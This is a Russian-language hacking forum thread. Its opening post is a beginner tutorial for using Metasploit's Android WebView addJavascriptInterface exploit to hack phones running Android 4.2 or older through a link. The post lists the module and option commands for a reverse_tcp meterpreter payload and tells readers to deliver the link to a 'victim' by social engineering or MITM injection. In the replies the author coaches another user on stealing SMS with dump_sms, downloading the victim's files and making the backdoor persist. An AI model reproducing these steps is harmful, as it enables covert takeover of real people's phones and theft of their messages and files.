Android WebView Exploit(Или взлом андроида по ссылке)

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#1
Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств
версии не больше (4.2.x)



Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:
1)Запустить метасплоит
2)Выбераем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterface


3)Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
[/URL]
[/IMG]

4)Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...


5)Ловим метерпретер сессию



 

xxxcrow

Active Member
29.11.2016
33
2
19
#3
ребят, что то у меня ссылку не открывает
в чем проблема?
 

xxxcrow

Active Member
29.11.2016
33
2
19
#5
Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.
простите, уже все нормально))
ток сейчас проблема, не могу сделать почти ничего, ни дампы не какие, не геолокацию,
мне кажется это изза того что я priv не могу поставить, говорит что такого фала нет
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#6
Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:
Код:
/root/Рабочий\ Стол\sms.txt
 

xxxcrow

Active Member
29.11.2016
33
2
19
#8
Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:
Код:
/root/Рабочий\ Стол\sms.txt
помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#9
Тогда извини)
помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
 

xxxcrow

Active Member
29.11.2016
33
2
19
#10
Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
тоже самое, и так с большенством команд,
хотя все 1-в-1 делаю как в туториалах (даже как и сам создатель метасплойта(или метерпетера))
позже попробую с другим телефоном, странно что на этом не работает нормально
(могу менять файлы и прочее, а вот что то дельное нет, не местоположения ни чего остального подобного)
 

xxxcrow

Active Member
29.11.2016
33
2
19
#11
Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
кароче, есть предположение что у метерпретера нет доступа к руту, вот что :D
как сделать? :D
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#13
а еще как я понял, после перезагрузки все теряется? :О
Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?
В метерпретере есть команда download
 

xxxcrow

Active Member
29.11.2016
33
2
19
#14
Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?

В метерпретере есть команда download
метасплоит от рута, да, под словом все подрузамевается ну сессия и сам бекдор ._.

(на счет скачивания разобрался уже)))

(я даже только что выгрузил скрипт что бы рут получить для метерпретера)
 
Последнее редактирование:

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#15
под словом все подрузамевается ну сессия и сам бекдор
Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
 

xxxcrow

Active Member
29.11.2016
33
2
19
#16
Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
а как закрепить? (в голове только одна мысль, сделать бекдор, ток вот как его установить?)
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#17
Симпатии: Понравилось xxxcrow

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#20
Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))